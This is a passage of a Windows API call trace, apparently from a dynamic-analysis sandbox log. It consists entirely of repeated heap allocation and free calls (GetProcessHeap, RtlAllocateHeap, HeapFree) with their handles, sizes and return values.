[0058.432] GetProcessHeap () returned 0x280000 [0058.432] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.432] GetProcessHeap () returned 0x280000 [0058.432] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.432] GetProcessHeap () returned 0x280000 [0058.432] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.432] GetProcessHeap () returned 0x280000 [0058.432] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.432] GetProcessHeap () returned 0x280000 [0058.432] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.432] GetProcessHeap () returned 0x280000 [0058.432] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.432] GetProcessHeap () returned 0x280000 [0058.432] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.432] GetProcessHeap () returned 0x280000 [0058.433] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.433] GetProcessHeap () returned 0x280000 [0058.433] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.433] GetProcessHeap () returned 0x280000 [0058.433] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.433] GetProcessHeap () returned 0x280000 [0058.433] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.433] GetProcessHeap () returned 0x280000 [0058.433] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.433] GetProcessHeap () returned 0x280000 [0058.433] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.433] GetProcessHeap () returned 0x280000 [0058.433] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.433] GetProcessHeap () returned 0x280000 [0058.433] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.433] GetProcessHeap () returned 0x280000 [0058.433] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.433] GetProcessHeap () returned 0x280000 [0058.433] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.433] GetProcessHeap () returned 0x280000 [0058.433] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.433] GetProcessHeap () returned 0x280000 [0058.433] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.433] GetProcessHeap () returned 0x280000 [0058.433] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.433] GetProcessHeap () returned 0x280000 [0058.433] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.433] GetProcessHeap () returned 0x280000 [0058.433] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.433] GetProcessHeap () returned 0x280000 [0058.433] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.433] GetProcessHeap () returned 0x280000 [0058.433] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.433] GetProcessHeap () returned 0x280000 [0058.433] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.433] GetProcessHeap () returned 0x280000 [0058.433] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.433] GetProcessHeap () returned 0x280000 [0058.434] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.434] GetProcessHeap () returned 0x280000 [0058.434] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.434] GetProcessHeap () returned 0x280000 [0058.434] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.434] GetProcessHeap () returned 0x280000 [0058.434] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.434] GetProcessHeap () returned 0x280000 [0058.434] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.434] GetProcessHeap () returned 0x280000 [0058.434] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.434] GetProcessHeap () returned 0x280000 [0058.434] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.434] GetProcessHeap () returned 0x280000 [0058.434] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.434] GetProcessHeap () returned 0x280000 [0058.434] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.434] GetProcessHeap () returned 0x280000 [0058.434] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.434] GetProcessHeap () returned 0x280000 [0058.434] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.434] GetProcessHeap () returned 0x280000 [0058.434] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.434] GetProcessHeap () returned 0x280000 [0058.434] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.434] GetProcessHeap () returned 0x280000 [0058.434] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.434] GetProcessHeap () returned 0x280000 [0058.434] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.434] GetProcessHeap () returned 0x280000 [0058.434] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.434] GetProcessHeap () returned 0x280000 [0058.434] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.434] GetProcessHeap () returned 0x280000 [0058.434] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.434] GetProcessHeap () returned 0x280000 [0058.434] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.435] GetProcessHeap () returned 0x280000 [0058.435] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.435] GetProcessHeap () returned 0x280000 [0058.435] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.435] GetProcessHeap () returned 0x280000 [0058.435] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.435] GetProcessHeap () returned 0x280000 [0058.435] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.435] GetProcessHeap () returned 0x280000 [0058.435] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.435] GetProcessHeap () returned 0x280000 [0058.435] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.435] GetProcessHeap () returned 0x280000 [0058.435] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.435] GetProcessHeap () returned 0x280000 [0058.435] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.435] GetProcessHeap () returned 0x280000 [0058.435] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.435] GetProcessHeap () returned 0x280000 [0058.435] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.435] GetProcessHeap () returned 0x280000 [0058.435] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.435] GetProcessHeap () returned 0x280000 [0058.435] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.435] GetProcessHeap () returned 0x280000 [0058.435] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.435] GetProcessHeap () returned 0x280000 [0058.435] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.435] GetProcessHeap () returned 0x280000 [0058.435] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.435] GetProcessHeap () returned 0x280000 [0058.435] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.435] GetProcessHeap () returned 0x280000 [0058.435] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.435] GetProcessHeap () returned 0x280000 [0058.435] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.435] GetProcessHeap () returned 0x280000 [0058.435] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.436] GetProcessHeap () returned 0x280000 [0058.436] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.436] GetProcessHeap () returned 0x280000 [0058.436] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.436] GetProcessHeap () returned 0x280000 [0058.436] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.436] GetProcessHeap () returned 0x280000 [0058.436] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.436] GetProcessHeap () returned 0x280000 [0058.436] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.436] GetProcessHeap () returned 0x280000 [0058.436] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.436] GetProcessHeap () returned 0x280000 [0058.436] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.436] GetProcessHeap () returned 0x280000 [0058.436] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.436] GetProcessHeap () returned 0x280000 [0058.436] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.436] GetProcessHeap () returned 0x280000 [0058.436] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.436] GetProcessHeap () returned 0x280000 [0058.436] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.436] GetProcessHeap () returned 0x280000 [0058.436] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.436] GetProcessHeap () returned 0x280000 [0058.436] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.436] GetProcessHeap () returned 0x280000 [0058.436] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.436] GetProcessHeap () returned 0x280000 [0058.436] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.436] GetProcessHeap () returned 0x280000 [0058.436] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.436] GetProcessHeap () returned 0x280000 [0058.436] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.436] GetProcessHeap () returned 0x280000 [0058.436] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.436] GetProcessHeap () returned 0x280000 [0058.437] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.437] GetProcessHeap () returned 0x280000 [0058.437] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.437] GetProcessHeap () returned 0x280000 [0058.437] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.437] GetProcessHeap () returned 0x280000 [0058.437] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.437] GetProcessHeap () returned 0x280000 [0058.437] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.437] GetProcessHeap () returned 0x280000 [0058.437] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.437] GetProcessHeap () returned 0x280000 [0058.437] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.437] GetProcessHeap () returned 0x280000 [0058.437] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.437] GetProcessHeap () returned 0x280000 [0058.437] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.437] GetProcessHeap () returned 0x280000 [0058.437] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.437] GetProcessHeap () returned 0x280000 [0058.437] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.437] GetProcessHeap () returned 0x280000 [0058.437] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.437] GetProcessHeap () returned 0x280000 [0058.437] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.437] GetProcessHeap () returned 0x280000 [0058.437] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.437] GetProcessHeap () returned 0x280000 [0058.437] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.437] GetProcessHeap () returned 0x280000 [0058.437] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.437] GetProcessHeap () returned 0x280000 [0058.437] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.437] GetProcessHeap () returned 0x280000 [0058.437] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.437] GetProcessHeap () returned 0x280000 [0058.437] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.438] GetProcessHeap () returned 0x280000 [0058.438] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.438] GetProcessHeap () returned 0x280000 [0058.438] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.438] GetProcessHeap () returned 0x280000 [0058.438] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.438] GetProcessHeap () returned 0x280000 [0058.438] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.438] GetProcessHeap () returned 0x280000 [0058.438] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.438] GetProcessHeap () returned 0x280000 [0058.438] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.438] GetProcessHeap () returned 0x280000 [0058.438] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.438] GetProcessHeap () returned 0x280000 [0058.438] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.438] GetProcessHeap () returned 0x280000 [0058.438] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.438] GetProcessHeap () returned 0x280000 [0058.438] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.438] GetProcessHeap () returned 0x280000 [0058.438] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.438] GetProcessHeap () returned 0x280000 [0058.438] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.438] GetProcessHeap () returned 0x280000 [0058.438] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.438] GetProcessHeap () returned 0x280000 [0058.438] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.438] GetProcessHeap () returned 0x280000 [0058.438] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.438] GetProcessHeap () returned 0x280000 [0058.438] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.438] GetProcessHeap () returned 0x280000 [0058.438] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.438] GetProcessHeap () returned 0x280000 [0058.438] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.438] GetProcessHeap () returned 0x280000 [0058.438] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.439] GetProcessHeap () returned 0x280000 [0058.439] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.439] GetProcessHeap () returned 0x280000 [0058.439] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.439] GetProcessHeap () returned 0x280000 [0058.439] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.439] GetProcessHeap () returned 0x280000 [0058.439] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.439] GetProcessHeap () returned 0x280000 [0058.439] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.439] GetProcessHeap () returned 0x280000 [0058.439] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.439] GetProcessHeap () returned 0x280000 [0058.439] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.439] GetProcessHeap () returned 0x280000 [0058.439] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.439] GetProcessHeap () returned 0x280000 [0058.439] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.439] GetProcessHeap () returned 0x280000 [0058.439] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.439] GetProcessHeap () returned 0x280000 [0058.439] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.439] GetProcessHeap () returned 0x280000 [0058.439] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.439] GetProcessHeap () returned 0x280000 [0058.439] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.439] GetProcessHeap () returned 0x280000 [0058.439] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.439] GetProcessHeap () returned 0x280000 [0058.439] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.439] GetProcessHeap () returned 0x280000 [0058.439] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.439] GetProcessHeap () returned 0x280000 [0058.439] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.439] GetProcessHeap () returned 0x280000 [0058.439] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.439] GetProcessHeap () returned 0x280000 [0058.439] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.440] GetProcessHeap () returned 0x280000 [0058.440] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.440] GetProcessHeap () returned 0x280000 [0058.440] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.440] GetProcessHeap () returned 0x280000 [0058.440] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.440] GetProcessHeap () returned 0x280000 [0058.440] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.440] GetProcessHeap () returned 0x280000 [0058.440] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.440] GetProcessHeap () returned 0x280000 [0058.440] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.440] GetProcessHeap () returned 0x280000 [0058.440] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.440] GetProcessHeap () returned 0x280000 [0058.440] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.440] GetProcessHeap () returned 0x280000 [0058.440] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.440] GetProcessHeap () returned 0x280000 [0058.440] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.440] GetProcessHeap () returned 0x280000 [0058.440] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.440] GetProcessHeap () returned 0x280000 [0058.440] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.440] GetProcessHeap () returned 0x280000 [0058.440] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.440] GetProcessHeap () returned 0x280000 [0058.440] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.440] GetProcessHeap () returned 0x280000 [0058.440] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.440] GetProcessHeap () returned 0x280000 [0058.440] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.440] GetProcessHeap () returned 0x280000 [0058.440] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.440] GetProcessHeap () returned 0x280000 [0058.440] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.440] GetProcessHeap () returned 0x280000 [0058.441] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.441] GetProcessHeap () returned 0x280000 [0058.441] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.441] GetProcessHeap () returned 0x280000 [0058.441] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.441] GetProcessHeap () returned 0x280000 [0058.441] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.441] GetProcessHeap () returned 0x280000 [0058.441] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.441] GetProcessHeap () returned 0x280000 [0058.441] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.441] GetProcessHeap () returned 0x280000 [0058.441] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.441] GetProcessHeap () returned 0x280000 [0058.441] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.441] GetProcessHeap () returned 0x280000 [0058.441] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.441] GetProcessHeap () returned 0x280000 [0058.441] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.441] GetProcessHeap () returned 0x280000 [0058.441] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.441] GetProcessHeap () returned 0x280000 [0058.441] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.441] GetProcessHeap () returned 0x280000 [0058.441] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.441] GetProcessHeap () returned 0x280000 [0058.441] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.441] GetProcessHeap () returned 0x280000 [0058.441] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.441] GetProcessHeap () returned 0x280000 [0058.441] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.441] GetProcessHeap () returned 0x280000 [0058.441] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1dc0 [0058.441] GetProcessHeap () returned 0x280000 [0058.441] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.441] GetProcessHeap () returned 0x280000 [0058.441] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.442] GetProcessHeap () returned 0x280000 [0058.442] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1dc0 | out: hHeap=0x280000) returned 1 [0058.442] GetProcessHeap () returned 0x280000 [0058.442] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.442] GetProcessHeap () returned 0x280000 [0058.442] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.442] GetProcessHeap () returned 0x280000 [0058.442] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.442] GetProcessHeap () returned 0x280000 [0058.442] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 